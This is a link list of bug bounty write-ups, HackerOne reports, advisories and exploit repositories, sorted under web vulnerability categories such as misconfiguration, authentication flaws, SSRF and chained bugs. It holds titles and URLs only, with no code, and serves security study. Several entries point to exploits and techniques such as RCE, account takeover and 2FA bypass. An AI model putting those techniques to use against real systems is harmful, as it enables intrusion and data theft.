<a href="https://medium.com/@bxmbn/how-i-made-16-500-hacking-cdn-caching-servers-part-2-4995ece4c6e6">-How I Made $16,500 Hacking CDN Caching Servers — Part 2</a>
<a href="https://medium.com/@bxmbn/how-i-made-16-500-hacking-cdn-caching-servers-part-3-91f9d836e046">-How I Made $16,500 Hacking CDN Caching Servers — Part 3</a>
<a href="https://medium.com/@Kntjrld/bypassing-default-visibility-for-newly-added-email-in-facebook-part-i-submitting-i-d-da78142f032d">-Bypassing default visibility for newly-added email in Facebook(Part I - Submitting I.D)</a>
<a href="https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption">-Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption</a>
<a href="https://medium.com/@Kntjrld/bypassing-default-visibility-for-newly-added-email-in-facebook-part-ii-trusted-contacts-36176eeb103">-Bypassing default visibility for newly-added email in Facebook(Part II - Trusted Contacts)</a>
<a href="https://hackerone.com/reports/170552">-Slack integration setup lacks CSRF protection</a>
<a href="https://elinfosec.com/2022/my-first-report-on-hackerone-a-logic-flaw-in-npm/">-My first report on HackerOne: A logic flaw in npm</a>
<a href="https://hackerone.com/reports/1065500">-Multiple bugs leads to RCE on TikTok for Android</a>
<A href="http://ysamm.com/?p=627">-Leaking Facebook user information to external websites ($2000)</a>
## Security Misconfiguration
<a href="https://xcheater.medium.com/all-about-password-reset-vulnerabilities-3bba86ffedc7">-All about Password Reset vulnerabilities</a>
<a href="https://security.humanativaspa.it/nothing-new-under-the-sun/">-Nothing new under the Sun – Discovering and exploiting a CDE bug chain</a>
<a href="https://medium.com/@moSec/how-i-hacked-thousand-of-subdomains-6aa43b92282c">-How I hacked thousand of subdomains</a>
<a href="https://github.com/WeAreCloudar/s3-account-search">-S3 Account Search</a>
<a href="https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/">-Unusual Cache Poisoning between Akamai and S3 buckets</a>
<a href="https://medium.com/@nanwinata/old-rce-worth-3362-1af0cd70c459">-Old RCE worth $3362</a>
<a href="https://yaseenzubair.medium.com/web-cache-poisoning-worth-it-e7c6d88797b1">-Web-Cache Poisoning $$$? Worth it?</a>
<a href="https://medium.com/@sicks3c/how-i-scored-1k-bounty-using-waybackurls-717d9673ca52">-How I Scored 1K Bounty Using Waybackurls</a>
<a href="https://xcheater.medium.com/all-about-csrf-flaw-7d525be39587">-All About CSRF Flaw</a>
<a href="https://www.alevsk.com/2022/11/system-misconfiguration-is-the-number-one-vulnerability-at-least-for-mastodon/">-System misconfiguration is the number one vulnerability, at least for Mastodon</a>
<a href="https://medium.com/@levshmelevv/10-000-bounty-for-exposed-git-to-rce-304c7e1f54">-$10.000 bounty for exposed .git to RCE</a>
<a href="https://www.legitsecurity.com/blog/exposing-secrets-via-sdlc-tools-the-sonarqube-case">-Exposing Secrets Via SDLC Tools: The SonarQube Case</a>
<a href="https://medium.com/@mukundbhuva/account-takeover-due-to-cognito-misconfiguration-earns-me-xxxx-3a7b8bb9a619">-Account Takeover Due to Cognito Misconfiguration Earns Me €xxxx</a>
<a href="https://portswigger.net/research/detecting-web-message-misconfigurations-for-cross-domain-credential-theft">-Detecting web message misconfigurations for cross-domain credential theft</a>
<a href="https://blog.pksecurity.io/2023/01/16/2022-microsoft-teams-rce.html">-2022 Microsoft Teams RCE</a>
<a href="https://semgrep.dev/blog/2022/xml-security-in-java">-XML Security in Java - Java XML security issues and how to address them</a>
<a href="https://www.jhaddix.com/post/the-100-million-person-data-disclosure">-The 100+ Million Person Data Disclosure</a>
<a href="https://ltidi.medium.com/the-untold-sendbird-misconfigurations-1496d252bc69">-The Untold SendBird Misconfigurations</a>
<a href="https://mr-medi.github.io/research/2022/11/04/practical-client-side-path-traversal-attacks.html">-PRACTICAL CLIENT SIDE PATH TRAVERSAL ATTACKS</a>
<a href="https://tomforb.es/infosys-leaked-fulladminaccess-aws-keys-on-pypi-for-over-a-year/">-Infosys leaked FullAdminAccess AWS keys on PyPi for over a year</a>
<a href="https://hackerone.com/reports/1497169">-CSRF protection bypass in GitHub Enterprise management console</a>
<a href="https://medium.com/@valluvarsploit/fastly-subdomain-takeover-2000-217bb180730f">-Fastly Subdomain Takeover $2000</a>
<a href="https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp">-Stealing passwords from infosec Mastodon - without bypassing CSP</a>
<a href="https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable">-UNSERIALIZABLE, BUT UNREACHABLE: REMOTE CODE EXECUTION ON VBULLETIN</a>
<a href="https://www.sonarsource.com/blog/openemr-remote-code-execution-in-your-healthcare-system/">-OpenEMR - Remote Code Execution in your Healthcare System</a>
<a href="https://systemweakness.com/common-nginx-misconfiguration-leads-to-path-traversal-d58701e997bc">-Common Nginx Misconfiguration leads to Path Traversal</a>
<a href="https://googleprojectzero.blogspot.com/2022/11/gregor-samsa-exploiting-java-xml.html">-Gregor Samsa: Exploiting Java's XML Signature Verification</a>
<a href="https://shubhdeepp.medium.com/how-i-got-apple-hall-of-fame-3d86f858c05f">-How I got Apple Hall Of Fame !</a>
<a href="https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse/">-How to exploit insecure WebResourceResponse configurations + an example vulnerability in Amazon apps</a>
<a href="https://github.com/numanturle/CVE-2022-44877">-Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877</a>
<a href="https://www.hackerone.com/best-practices/preventing-compromised-password-reuse-hackeronecom">-Preventing compromised password reuse on HackerOne.com </a>
<a href="https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/">-CVE-2022-21703: cross-origin request forgery against Grafana</a>
<a href="https://apapedulimu.click/story-of-idor-on-google-product/">-2 CSRF 1 IDOR on Google Marketing Platform</a>
<a href="https://blog.projectdiscovery.io/php-http-server-source-disclosure/">-PHP Development Server <= 7.4.21 - Remote Source Disclosure</a>
<a href="https://hackerone.com/reports/1102764">-Lack of URL normalization renders Blocked-Previews feature ineffectual</a>
<a href="https://medium.com/@querylab/bypass-premium-account-payment-getpocket-d813b249687c">-Bypass Premium Account Payment (GetPocket)</a>
<a href="https://cyberw1ng.medium.com/manipulating-the-websocket-handshake-to-exploit-vulnerabilities-7f8dc3504e9c">-Manipulating the WebSocket handshake to exploit vulnerabilities</a>
<a href="https://www.whitesourcesoftware.com/resources/blog/aws-targeted-by-a-package-backfill-attack/">-AWS Targeted by a Package Backfill Attack</a>
<a href="https://www.intruder.io/research/server-side-prototype-pollution">-Detecting Server-Side Prototype Pollution</a>
<a href="https://hackerone.com/reports/1122408">-CSRF on /api/graphql allows executing mutations through GET requests</a>
<a href="https://blog.niksthehacker.com/xxe-in-public-transport-ticketing-mobile-app-81ae245c01a1">-XXE in Public Transport Ticketing Mobile APP</a>
<a href="https://medium.com/@botami143/i-have-found-microsoft-subdomain-website-database-list-database-username-password-1dab07d0c8ea">-I have Found Microsoft Subdomain Website database list, database username, password </a>
<a href="https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app">-Critical Local File Read in Electron Desktop App</a>
<a href="https://securityonline.info/cve-2022-46175-json5-prototype-pollution-vulnerability/">-CVE-2022-46175: JSON5 Prototype Pollution Vulnerability</a>
<a href="https://hackerone.com/reports/1596663">-Admin can create a hidden admin account which even the owner can not detect and remove and do administrative actions on the application.</a>
<a href="https://adityashende17.medium.com/hijacking-accounts-with-host-manipulation-using-collaborator-969f3234b29f">-Hijacking accounts with host manipulation using collaborator</a>
<a href="https://portswigger.net/research/server-side-prototype-pollution">-Server-side prototype pollution: Black-box detection without the DoS</a>
<a href="https://prajwoldhungana487.medium.com/demographic-misconfiguration-9359910c6fcf">-Demographic Misconfiguration on Facebook live </a>
<a href="https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/">-Pre-Auth RCE in Aspera Faspex: Case Guide for Auditing Ruby on Rails</a>
<a href="https://threatpost.com/valve-bug-unlimited-funds/168710/">-Critical Valve Bug Lets Gamers Add Unlimited Funds to Steam Wallets</a>
<a href="https://medium.com/@hacxyk/how-we-spoofed-ens-domains-52acea2079f6">-How we spoofed ENS domains for $15k</a>
<a href="https://hackingthe.cloud/aws/general-knowledge/aws_organizations_defaults/">-AWS Organizations Defaults</a>
<a href="https://hackerone.com/reports/1104874">-Basecamp disclosed on HackerOne: Insecure Bundler configuration</a>
<a href="https://notifybugme.medium.com/exploiting-s3-bucket-with-path-folder-to-access-pii-info-of-a-bank-91d8563cb45">-Exploiting S3 bucket with path folder to Access PII info of A BANK</a>
<a href="https://z3r0tru5t.medium.com/open-redirect-to-account-takeover-f1405cbdf2d">-Open Redirect to Account Takeover</a>
<a href="http://ysamm.com/?p=629">-Enumerate internal cached URLs which lead to data exposure</a>
<a href="http://ysamm.com/?p=625">-Open redirect in Instagram.com ($500)</a>
<a href="https://medium.com/@Bhichher/open-redirect-vulnerability-some-common-payloads-fd1dcd73541c">-Open Redirect Vulnerability & Some Common Payloads</a>
<a href="https://proviesec.medium.com/broken-link-hijacking-what-it-is-and-how-to-get-bounties-with-it-ca64db6a3f74">-Broken Link hijacking — What it is and how to get bounties with it!</a>
<a href="https://cramppet.github.io/regulator/index.html">-A unique method of subdomain enumeration</a>
<a href="https://blog.appsecco.com/exploiting-weak-configurations-in-google-identity-platform-cbddbd0e71e3">-Exploiting weak configurations in Google Cloud Identity Platform</a>
<a href="https://blog.talosintelligence.com/2022/10/vuln-spotlight-vcenter-.html">-VMware vCenter Server Platform Services Controller Unsafe Deserialization vulnerability</a>
<a href="https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/">-WordPress XXE Vulnerability in Media Library – CVE-2021-29447 </a>
<a href="https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/">-Insecure Deserialization in JavaScript: GoogleCTF 2022 Web/HORKOS Writeup</a>
<a href="https://mikekitckchan.medium.com/a-brief-introduction-to-prototype-pollution-b154c23b40c5">-A Brief Introduction to Prototype Pollution</a>
<a href="https://mikekitckchan.medium.com/cors-misconfig-that-worths-usd200-4696eda5ab4c">-CORS misconfig that worths USD200</a>
<a href="https://hackerone.com/reports/1256375">-Blog posts atom feed of a store with password protection can be accessed by anyone</a>
<a href="https://medium.com/immunefi/enzyme-finance-price-oracle-manipulation-bug-fix-postmortem-4e1f3d4201b5">-Enzyme Finance Price Oracle Manipulation Bug Fix Postmortem</a>
<a href="https://labs.withsecure.com/publications/prototype-pollution-primer-for-pentesters-and-programmers">-Prototype Pollution Primer for Pentesters and Programmers </a>
<a href="https://rajanagori.medium.com/a-long-story-of-xxe-vulnerability-6a9a33276602">-A Long Story of XXE Vulnerability!!</a>
<a href="https://flatt.tech/reports/210401_pwn2own/">-Pwn2Own Local Escalation of Privilege Category</a>
<a href="https://swordbytes.com/blog/security-advisory-overwolf-1-click-remote-code-execution-cve-2021-33501/">-Overwolf 1-Click Remote Code Execution - CVE-2021-33501</a>
<a href="https://www.varonis.com/blog/box-mfa-bypass-totp/">-Bypassing Box’s Time-based One-Time Password MFA</a>
<a href="https://portswigger.net/daily-swig/add-yourself-as-super-admin-researcher-details-easy-to-exploit-bug-that-exposed-gsuite-accounts-to-full-takeover">-‘Add yourself as super admin’ – Researcher details easy-to-exploit bug that exposed GSuite accounts to full takeover</a>
<a href="https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/">-Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666) Bounty award: $5,000.</a>
<a href="https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/">-Exploiting URL Parsing Confusion Vulnerabilities</a>
<a href="https://amakki.me/how-i-made-15k-from-remote-code-execution-vulnerability-2e1b14b3902a">-How i made 15k$ from Remote Code Execution Vulnerability</a>
<a href="https://palisade.consulting/blog/link-hijacking-binances-shortlinks-through-appsflyer">-Link hijacking Binance’s shortlinks through AppsFlyer</a>
<a href="https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/">-Flickr Account Takeover</a>
<a href="https://0xelmalky.medium.com/subdomain-takeover-via-flywheel-447a71d77396">-Subdomain Takeover Via Flywheel</a>
<a href="https://hackerone.com/reports/1087489">-Github access token exposure</a>
<a href="https://gonzx.medium.com/how-i-was-able-to-takeover-any-account-on-foxit-com-7a08efa0144f">How I was able to Takeover Accounts on Foxit.com</a>
<a href="https://blog.infiltrateops.io/hacking-apple-two-successful-exploits-and-positive-thoughts-on-their-bug-bounty-program-963efe7518f6">-Hacking Apple: Two Successful Exploits and Positive Thoughts on their Bug Bounty Program</a>
<a href="https://www.whitesourcesoftware.com/resources/blog/prototype-pollution-vulnerabilities/">-The Complete Guide to Prototype Pollution Vulnerabilities </a>
<a href="https://www.zapstiko.com/misconfigured-reset-password-that-leads-to-account-takeover/">-Misconfigured Reset password that leads to Account Takeover</a>
<a href="https://sicks3c.medium.com/from-a-user-to-admin-access-9f44ae1dedc0">-From A User To Admin Access</a>
<a href="https://inakcf.medium.com/2fa-bypass-via-forced-browsing-9e511dfdb8df">-2FA Bypass via Forced Browsing</a>
<a href="https://sensepost.com/blog/2021/duo-two-factor-authentication-bypass/">-Duo Two-factor Authentication Bypass</a>
<a href="https://blog.niksthehacker.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4">-Account Takeovers — Believe the Unbelievable</a>
<a href="https://medium.com/@kalvik/account-takeover-a-bonus-vulnerability-3c2dc4e607ea">-Account Takeover + A Bonus Vulnerability</a>
<a href="https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc">-Cross-Site WebSocket Hijacking (CSWSH)</a>
## Vulnerable and Outdated Components
<a href="https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage">-Zabbix - A Case Study of Unsafe Session Storage </a>
<a href="https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/">-Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7</a>
<a href="https://www.cyberkl.com/cvelist/cvedetail/24">-Writeup for an iOS 15 exploit that can achieve kernel</a>
<a href="https://github.com/hakivvi/CVE-2022-29464">-WSO2 RCE (CVE-2022-29464) exploit and writeup</a>
<a href="https://boschko.ca/tenda_ac1200_router/">-Vulnerabilities in Tenda's W15Ev2 AC1200 Router</a>
<a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html">-Exploiting CVE-2022-42703 - Bringing back the stack attack</a>
## Identification and Authentication Issues / Bugs
<a href="https://hackerone.com/reports/921780">-Improper Authentication - any user can login as other user with otp/logout & otp/login</a>
<a href="https://medium.com/@TutorialBoy24/a-summary-of-oauth-2-0-attack-methods-36834805c631">-A Summary of OAuth 2.0 Attack Methods</a>
<a href="https://medium.com/@elsherifx00/how-to-test-for-jwt-attacks-513da89abe94">-How to test for JWT attacks</a>
<a href="https://rammk01.medium.com/bypassed-the-subscription-and-got-the-certification-27c571c2f383">-Bypassed the subscription and got the certification</a>
<a href="https://medium.com/@jjowi/broken-authentication-login-with-google-b170fbb4b6d0">-Broken Authentication Login With Google</a>
<a href="https://portswigger.net/daily-swig/security-researcher-finds-dangerous-bug-in-chromium-nabs-15-000-bounty">-Security researcher finds dangerous bug in Chromium, nabs $15,000 bounty</a>
<a href="https://hackerone.com/reports/1552110">-OAUTH2 bearer not-checked for connection re-use</a>
<a href="https://vaibhavgaikwad1712.medium.com/2fa-bypass-using-response-manipulation-29d6c2583936">-2fa Bypass Using Response Manipulation</a>
<a href="https://bilalabdulmuqeet.medium.com/brute-forcing-otp-via-bypassing-rate-limit-c5ee6b25c2a8">-OTP brute-force via rate limit bypass</a>
<a href="https://anugrahsr.github.io/posts/10-Password-reset-flaws/">-10 Password Reset Flaws</a>
<a href="https://hackerone.com/reports/1245762">-Account Takeover via SMS Authentication Flow</a>
<a href="https://aravind07.medium.com/bypassing-login-page-in-2-mins-5b773d46f4d">-Bypassing Login Page in 2 Mins</a>
<a href="https://haxolot.com/posts/2021/moodle_pre_auth_shibboleth_rce_part1/">-Pre-Auth RCE in Moodle Part I - PHP Object Injection in Shibboleth Module</a>
<a href="https://haxolot.com/posts/2022/moodle_pre_auth_shibboleth_rce_part2/">-Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth</a>
<a href="https://newrouge.medium.com/web-cache-poisoning-a-tale-of-chaining-unkeyed-inputs-6e3cb026bd23">-Web Cache Poisoning: A Tale of chaining unkeyed inputs</a>
<a href="https://medium.com/@sajan.dhakate/exploiting-json-web-token-jwt-73d172b5bc02">-EXPLOITING JSON WEB TOKEN [JWT]</a>
<a href="https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/">-Security Advisory: Remote Command Execution in binwalk</a>
<a href="https://gowthamaraj-rajendran.medium.com/oauth-2-0-hacking-67e5d2b9b495">-OAuth 2.0 Hacking</a>
<a href="https://thehackernews.com/2022/01/researchers-bypass-sms-based-multi.html">-Researchers Bypass SMS-based Multi-Factor Authentication Protecting Box Accounts</a>
<a href="https://4bdoz.medium.com/trick-to-bypass-rate-limit-of-password-reset-functionality-a9923d3d7c4b">-Trick to bypass rate limit of password reset functionality</a>
<a href="https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html">-Exploiting OAuth: Journey to Account Takeover </a>
<a href="https://medium.com/@fatnassifiras45/a-tale-of-0-click-account-takeover-and-2fa-bypass-b369cd70e42f">-A tale of 0-Click Account Takeover and 2FA Bypass</a>
<a href="https://youst.in/posts/cache-poisoning-at-scale/">-Cache Poisoning at Scale</a>
<a href="https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html">-Exploiting OAuth: Journey to Account Takeover</a>
<a href="https://www.youtube.com/watch?v=Fzx7OWZId6U">-Account Takeover using OAuth Misconfiguration | Badoo Bug Bounty $300</a>
## Software and Data Integrity Failure
<a href="https://blog.dixitaditya.com/pwning-a-server-using-markdown">-Pwning a Server using Markdown</a>
<a href="https://medium.com/pentesternepal/how-i-found-a-bug-in-apple-within-just-in-5min-d7357237d7a0">-How I found a bug in Apple within just in 5min</a>
<a href="https://blog.impalabs.com/2212_advisory_huawei-security-hypervisor.html">-Huawei Security Hypervisor Vulnerability</a>
<a href="https://tutorialboy24.blogspot.com/2022/11/a-brief-introduction-to-saml-security.html">-A Brief Introduction to SAML Security Vector</a>
<a href="https://github.com/httpvoid/writeups/blob/main/Hacking-Google-Drive-Integrations.md">-Hacking Google Drive Integrations</a>
<a href="https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/">-Dependency Confusion</a>
<a href="https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608">Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit - CVE-2023-21608</a>
<a href="https://medium.com/@bababounty99/race-condition-resulted-in-using-the-feature-which-was-supposed-to-be-obtained-after-subscription-2bfe968d358c">-Race Condition — Resulted in using the feature which was supposed to be obtained after subscription.</a>
<a href="https://medium.com/@shabarkin/1-click-rce-in-electron-applications-79b52e1fe8b8">-1-click RCE in Electron Applications</a>
<a href="https://medium.com/@jacopotediosi/worldwide-server-side-cache-poisoning-on-all-akamai-edge-nodes-50k-bounty-earned-f97d80f3922b">-Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes ($50K+ Bounty Earned)</a>
<a href="https://securitylabs.datadoghq.com/articles/appsync-vulnerability-disclosure/">-A Confused Deputy Vulnerability in AWS AppSync</a>
<a href="https://portswigger.net/daily-swig/vulnerability-in-aws-appsync-allowed-unauthorized-access-to-cloud-resources">-Vulnerability in AWS AppSync allowed unauthorized access to cloud resources</a>
<a href="https://blog.lightspin.io/aws-ecr-public-vulnerability">-AWS ECR Public Vulnerability</a>
<a href="https://portswigger.net/daily-swig/melis-platform-cms-patched-for-critical-rce-flaw">-Melis Platform CMS patched for critical RCE flaw</a>
## Security Logging and Monitoring
<a href="https://ssd-disclosure.com/ssd-advisory-cisco-secure-manager-appliance-jwt_api_impl-hardcoded-jwt-secret-elevation-of-privilege/">-SSD Advisory – Cisco Secure Manager Appliance jwt_api_impl Hardcoded JWT Secret Elevation of Privilege</a>
## Server-Side Request Forgery
<a href="https://bugs.xdavidhu.me/google/2021/12/31/fixing-the-unfixable-story-of-a-google-cloud-ssrf/">-Story of a Google Cloud SSRF</a>
<a href="https://blog.deesee.xyz/fuzzing/security/2021/02/26/ssrf-bypassing-hostname-restrictions-fuzzing.html">-SSRF: Bypassing hostname restrictions with fuzzing</a>
<a href="https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530">-Just Gopher It: Escalating a Blind SSRF to RCE for $15k</a>
<a href="https://coffeejunkiee.github.io//Simple-SSRF/">-Simple SSRF Allows Access To Internal Assets</a>
<a href="https://hackerone.com/reports/1092230">-FogBugz import attachment full SSRF requiring vulnerability </a>
<a href="https://twitter.com/infosec_au/status/1434328794861432834">-Updated the Blind SSRF Glossary for a list of payloads that call back to an SSRF canary for the Confluence OGNL injection RCE</a>
<a href="https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/">-SSRF vulnerabilities and where to find them</a>
<a href="https://hoyahaxa.blogspot.com/2021/04/ssrf-in-coldfusioncfml-tags-and.html">-SSRF in ColdFusion/CFML Tags and Functions</a>
<a href="https://blog.assetnote.io/2022/01/17/workspace-one-access-ssrf/">-Stealing administrative JWT's through post auth SSRF (CVE-2021-22056)</a>
<a href="https://pwn.vg/articles/2021-05/ssrf-in-pdf-renderer-using-svg">-SSRF in PDF Renderer using SVG</a>
<a href="https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/">-Turning bad SSRF to good SSRF: Websphere Portal</a>
<a href="https://hackerone.com/reports/941178">-SSRF for kube-apiserver cloudprovider scene</a>
<a href="https://hackerone.com/reports/1189367">-Full read SSRF that can leak aws metadata and local file inclusion (www.evernote.com)</a>
<a href="https://xhzeem.me/posts/SSRF-in-PDF-export-with-PhantomJs/read/">-SSRF in PDF export with PhantomJs </a>
<a href="https://portswigger.net/daily-swig/java-rmi-services-often-vulnerable-to-ssrf-attacks-research">-Java RMI services often vulnerable to SSRF attacks – research</a>
<a href="https://www.shielder.com/advisories/cisco-broadworks-commpilot-ssrf/">-Cisco BroadWorks CommPilot Application Software Unauthenticated Server-Side Request Forgery (CVE-2022-20951)</a>
<a href="https://blog.securelayer7.net/wondercms-3-1-3-vulnerable-to-authenticated-server-side-request-forgery/">-WonderCMS 3.1.3 Vulnerable To Authenticated Server-Side Request Forgery – CVE-2020-35313</a>
<a href="https://goteleport.com/blog/ssrf-attacks/">-SSRF Attack Examples and Mitigations</a>
<a href="https://xelkomy.medium.com/easy-ssrf-from-wayback-machine-edf946486120">-Easy SSRF from Wayback Machine</a>
<a href="https://medium.com/@raymond-lind/ssrf-lfi-in-uploads-feature-321d83b93ec0">-SSRF & LFI In Uploads Feature</a>
<a href="https://blog.neolex.dev/13/">-Critical SSRF on Evernote</a>
<a href="https://medium.com/@tobydavenn/bypassing-ssrf-protections-45e5e3ac31e9">-Bypassing SSRF Protections</a>
<a href="https://thehemdeep.medium.com/cross-site-port-attack-in-wild-9d2f6af36455">-Cross Site Port Attack in Wild</a>
<a href="https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/">-Encrypting our way to SSRF in VMWare Workspace One UEM (CVE-2021-22054)</a>
<a href="https://gccybermonks.com/posts/ssrfvision/">-Another vision for SSRF</a>
<a href="https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/">-WordPress Core - Unauthenticated Blind SSRF</a>
<a href="https://srahulceh.medium.com/bug-bounty-how-i-found-an-ssrf-reconnaissance-7b1821a1b1fd">-Bug Bounty { How I found an SSRF ( Reconnaissance ) }</a>
<a href="https://spidersilk.com/news/cloud-is-more-fun-with-an-ssrf">-Cloud is more fun with an SSRF</a>
<a href="https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/">-Server side prototype pollution, how to detect and exploit</a>
<a href="https://medium.com/@basu-banakar/ssrf-via-dns-rebinding-cve-2022-4096-b7bf75928bb2">-SSRF via DNS Rebinding (CVE-2022–4096)</a>
# Chained Issues / Chained Bugs :
<a href="https://medium.com/@tushar.tilak.sharma/a-tale-of-open-redirection-to-stored-xss-6ad426ae9d43">-A Tale of Open Redirection to Stored XSS</a>
<a href="https://medium.com/@faique/story-of-a-1k-bounty-ssrf-d5c4868680f5">-Story of a $1k bounty — SSRF to leaking access token and other sensitive information</a>
<a href="https://medium.com/@TutorialBoy24/the-story-of-3-bugs-that-lead-to-unauthorized-rce-pascom-systems-d2dcb0410f3b">-The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems</a>
<a href="https://www.ukusormus.com/bypassing-cloudflare-waf-xss-via-sql-injection/">-Bypassing Cloudflare WAF: XSS via SQL Injection</a>
<a href="https://medium.com/@moSec/crlf-to-account-takeover-chaining-bugs-21a25dfa1cdf">-CRLF to Account takeover (chaining bugs)</a>
<a href="https://portswigger.net/daily-swig/internet-bug-bounty-high-severity-vulnerability-in-apache-http-server-could-lead-to-rce">-Internet Bug Bounty: High severity vulnerability in Apache HTTP Server could lead to RCE</a>
<a href="https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/">-SSRF vulnerabilities caused by SNI proxy misconfigurations</a>
<a href="https://blog.sonarsource.com/checkmk-rce-chain-3/">-Checkmk: Remote Code Execution by Chaining Multiple Bugs (3/3)</a>
<a href="https://blog.assetnote.io/2022/10/28/exploiting-static-site-generators/">-Exploiting Static Site Generators: When Static Is Not Actually Static</a>
<a href="https://www.oxeye.io/blog/remote-code-execution-in-spotifys-backstage">-Remote Code Execution in Spotify’s Backstage via vm2 Sandbox Escape (CVSS Score of 9.8)</a>
<a href="https://omar0x01.medium.com/cve-2022-42710-a-journey-through-xxe-to-stored-xss-851d74dfe917">-CVE-2022–42710: A journey through XXE to Stored-XSS</a>
<a href="https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf">-Abusing JSON-Based SQL to Bypass WAF</a>
<a href="https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/">-SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction</a>
<a href="https://sl4x0.medium.com/research-bypass-csrf-protection-w-xss-710faf20000">-Research | Bypass CSRF Protection w/ XSS</a>
<a href="https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/">-RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass</a>
<a href="https://portswigger.net/daily-swig/prototype-pollution-project-yields-another-parse-server-rce">-Prototype pollution project yields another Parse Server RCE</a>
<a href="https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering">-Hijacking service workers via DOM Clobbering</a>
<a href="https://frycos.github.io/vulns4free/2022/12/02/rce-in-20-minutes.html">-Pre-Auth RCE with CodeQL in Under 20 Minutes</a>
<a href="https://emily.id.au/tailscale">-CVE-2022-41924 - RCE in Tailscale, DNS Rebinding, and You</a>
<a href="https://portswigger.net/daily-swig/nodebb-prototype-pollution-flaw-could-lead-to-account-takeover">-NodeBB prototype pollution flaw could lead to account takeover</a>
<a href="https://hdwsec.fr/blog/20221109-netgear/">-NETGEAR NIGHTHAWK R7000P AWS_JSON UNAUTHENTICATED DOUBLE STACK OVERFLOW VULNERABILITY </a>
<a href="https://medium.com/@LIL__NIX/the-story-of-a-rce-on-a-java-web-application-2e400cddcd1e">-The Story of a RCE on a Java Web Application</a>
<a href="https://medium.com/cider-sec/bypassing-required-reviews-using-github-actions-6e1b29135cc7">-Bypassing required reviews using GitHub Actions</a>
<a href="https://medium.com/@haroonhameed_76621/achieving-remote-code-execution-via-unrestricted-file-upload-6050f360c218">-Achieving Remote Code Execution via Unrestricted File Upload</a>
<a href="https://0xmahmoudjo0.medium.com/admin-account-takeover-via-weird-password-reset-functionality-166ce90b1e58">-Admin account takeover via weird Password Reset Functionality</a>
<a href="https://portswigger.net/daily-swig/node-js-was-vulnerable-to-a-novel-http-request-smuggling-technique">-Node.js was vulnerable to a novel HTTP request smuggling technique</a>
<a href="https://blog.niksthehacker.com/chaining-path-traversal-with-ssrf-to-disclose-internal-git-repo-data-in-a-bank-asset-8af4de6f12e">-Chaining Path Traversal with SSRF to disclose internal git repo data in a Bank Asset</a>
<a href="https://blog.doyensec.com/2022/10/27/jupytervscode.html">-Visual Studio Code Jupyter Notebook RCE</a>
<a href="https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/">-Exploiting Arbitrary Object Instantiations in PHP without Custom Classes</a>
<a href="https://vulndev.io/2022/09/09/browser-exploitation-firefox-oob-to-rce/">-Browser Exploitation: Firefox OOB to RCE</a>
<a href="https://positive.security/blog/dompdf-rce">-From XSS to RCE (dompdf 0day)</a>
<a href="https://portswigger.net/research/bypassing-firefoxs-html-sanitizer-api">-Bypassing Firefox's HTML Sanitizer API</a>
<A href="http://ysamm.com/?p=621">-Access private information about SparkAR effect owners who has a publicly viewable portfolio ($1500)</a>
<a href="https://mrkrhy-xyz.medium.com/tagged-user-could-delete-facebook-story-d7f9cdde92aa">-Tagged User Could Delete Facebook Story</a>
<a href="https://hackerone.com/reports/1439593">-Arbitrary file read via the bulk imports UploadsPipeline </a>
<a href="https://medium.com/@tobydavenn/how-i-was-able-to-takeover-any-account-on-one-of-europes-largest-media-companies-e8d25e59c08">-How I Was Able To TakeOver Any Account On One Of Europe's Largest Media Companies</a>
<a href="https://0xacb.com/2022/11/21/recollapse/">-Fuzzing the web for mysterious bugs</a>
